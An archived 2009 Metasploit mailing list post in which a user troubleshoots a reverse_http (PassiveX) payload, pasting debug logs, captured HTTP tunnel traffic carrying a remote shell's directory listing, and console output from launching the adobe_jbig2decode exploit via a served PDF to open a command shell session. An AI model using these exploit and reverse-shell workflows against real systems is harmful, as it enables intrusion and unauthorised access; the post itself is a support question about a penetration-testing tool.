Metasploit mailing list archives
problem with passiveX (reverse_http) payloads: nothing in return to commands
From: irian2003 at yahoo.com (Bogdan Sandu)
Date: Fri, 3 Apr 2009 16:04:34 -0700 (PDT)
here is the output from the log with LogLevel 3 [04/04/2009 01:55:37] [d(2)] core: windows/shell/reverse_http: Successfully encoded with encoder x86/shikata_ga_nai (size is 501) [04/04/2009 01:55:38] [d(2)] core: PassiveX listener started on http://0.0.0.0:8081/O1rKpDovm9rJM6SUIjor9EQCsPdDFnLs [04/04/2009 01:55:50] [d(2)] core: windows/shell/reverse_http: Successfully encoded with encoder x86/shikata_ga_nai (size is 501) [04/04/2009 01:56:02] [d(3)] core: PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xb6b4b304> Writing 0 to local side [04/04/2009 01:56:54] [d(3)] core: PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xb6b4b304> Queuing 4 to remote side [04/04/2009 01:56:54] [d(3)] core: PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xb6b4b304> Flushing remote output queue at 4 bytes [04/04/2009 01:56:55] [d(3)] core: PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xb6b4b304> Writing 0 to local side [04/04/2009 01:56:56] [d(3)] core: PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xb6b4b304> Writing 0 to local side --- On Sat, 4/4/09, Bogdan Sandu <irian2003 at yahoo.com> wrote: From: Bogdan Sandu <irian2003 at yahoo.com> Subject: [framework] problem with passiveX (reverse_http) payloads: nothing in return to commands To: framework at spool.metasploit.com Date: Saturday, April 4, 2009, 12:53 AM Hello, I have a problem with the reverse_http payloads. The exploit succedes and looking with tcpdump at the traffic between the proxy server and the port of the payload I see the commands being executed, but after interacting with the session I see nothing returned to my commands: ---------------------------- GET /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_out HTTP/1.0 X-Sid: sid=2 Host: 0.0.0.0:8081 Pragma: no-cache Via: 1.1 xyz.com (squid/3.0.STABLE8) X-Forwarded-For: 127.0.0.1 Cache-Control: max-age=259200 Connection: keep-alive ?HTTP/1.1 200 OK Content-Length: 4 Server: Rex Connection: close? Dir ------------------------------------ GET /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_out HTTP/1.0 X-Sid: sid=2 Host: 0.0.0.0:8081 Pragma: no-cache Via: 1.1 xyz.com (squid/3.0.STABLE8) X-Forwarded-For: 127.0.0.1 Cache-Control: max-age=259200 Connection: keep-alive ----------------------------------- POST /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_in HTTP/1.0 X-Sid: sid=2 Host: 0.0.0.0:8081 Content-Length: 1024 Pragma: no-cache Via: 1.1 xyz.com (squid/3.0.STABLE8) X-Forwarded-For: 127.0.0.1 Cache-Control: max-age=259200 Connection: keep-alive? dir ?Volume in drive C has no label. Volume Serial Number is 0CAA-3013? ?Directory of C:\Documents and Settings\irian\Desktop? 04/03/2009 11:43 PM <DIR> . 04/03/2009 11:43 PM <DIR> .. 04/01/2009 10:09 AM 27,136 Activ.doc 02/27/2009 12:09 PM 169,984 carte optional.doc 03/07/2009 12:48 PM 131 jboss.txt 04/02/2009 03:48 AM 288,237 lo.cap 03/30/2009 12:17 PHTTP/1.1 200 OK Content-Length: 0 Server: Rex Connection: Keep-Alive ----------------------------- POST /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_in HTTP/1.0 X-Sid: sid=2 Host: 0.0.0.0:8081 Content-Length: 230 Pragma: no-cache Via: 1.1 xyz.com (squid/3.0.STABLE8) X-Forwarded-For: 127.0.0.1 Cache-Control: max-age=259200 Connection: keep-alive? M 247,666 users_guide.pdf 03/25/2009 10:32 PM 24,064 youtube.doc 15 File(s) 2,111,721 bytes 3 Dir(s) 959,123,456 bytes free? C:\Documents and Settings\irian\Desktop>HTTP/1.1 200 OK Content-Length: 0 Server: Rex Connection: Keep-Alive ---------------------------------------- msf exploit(adobe_jbig2decode) > exploit [*] Exploit running as background job. msf exploit(adobe_jbig2decode) > [*] PassiveX listener started. [*] Using URL: http://0.0.0.0:8080/carti.pdf [*] Local IP: http://1.2.3.4:8080/carti.pdf [*] Server started. [*] Sending Adobe JBIG2Decode Memory Corruption Exploit to 1.2.3.4:50007... [*] Sending PassiveX main page to client [*] Sending PassiveX main page to client [*] Command shell session 1 opened (Local Pipe -> Remote Pipe) [*] Sending stage to sid 2 (474 bytes) msf exploit(adobe_jbig2decode) > sessions -l Active sessions =============== ? Id Description Tunnel ? -- ----------- ------ ? 1 Command shell Local Pipe -> Remote Pipe msf exploit(adobe_jbig2decode) > sessions -i 1 [*] Starting interaction with 1... ls dir dir Any ideeas why this is happening.Thanks a lot and keep up doing a great job. Bogdan -----Inline Attachment Follows----- _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090403/eb5bd982/attachment.htm>
Current thread:
- problem with passiveX (reverse_http) payloads: nothing in return to commands Bogdan Sandu (Apr 03)
- <Possible follow-ups>
- problem with passiveX (reverse_http) payloads: nothing in return to commands Bogdan Sandu (Apr 03)